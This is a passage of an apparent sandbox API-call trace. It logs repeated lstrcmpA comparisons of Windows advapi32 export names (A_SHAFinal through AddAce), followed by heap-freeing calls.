lpString2="A_SHAUpdate") returned 1 [0081.824] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0081.824] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0081.824] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0081.824] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0081.824] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0081.824] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0081.824] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0081.824] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0081.824] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0081.824] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0081.824] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0081.824] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0081.824] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0081.824] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0081.824] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0081.824] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0081.824] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0081.824] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0081.824] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0081.825] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0081.825] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0081.825] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0081.825] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0081.825] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0081.825] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0081.825] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0081.825] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0081.825] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0081.825] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0081.825] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0081.825] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0081.825] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0081.825] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0081.825] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0081.825] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0081.825] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0081.825] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0081.825] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0081.825] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0081.825] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0081.826] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0081.827] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0081.828] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0081.828] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0081.828] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0081.828] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0081.828] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0081.828] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0081.828] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0081.828] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0081.828] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0081.828] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0081.828] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0081.828] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0081.828] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0081.828] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0081.828] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0081.828] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0081.828] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0081.828] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0081.828] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0081.828] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0081.828] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0081.828] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0081.828] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0081.828] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0081.828] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0081.828] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0081.828] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0081.828] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0081.828] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0081.828] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0081.828] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0081.828] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0081.828] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0081.828] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0081.829] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0081.829] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0081.830] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0081.830] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0081.831] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0081.831] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0081.832] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0081.832] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0081.832] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0081.832] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0081.832] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0081.832] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0081.832] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0081.832] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0081.832] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0081.832] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0081.832] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0081.832] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0081.832] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0081.832] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0082.128] GetProcessHeap () returned 0x440000 [0082.128] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2c72010 | out: hHeap=0x440000) returned 1 [0082.134] 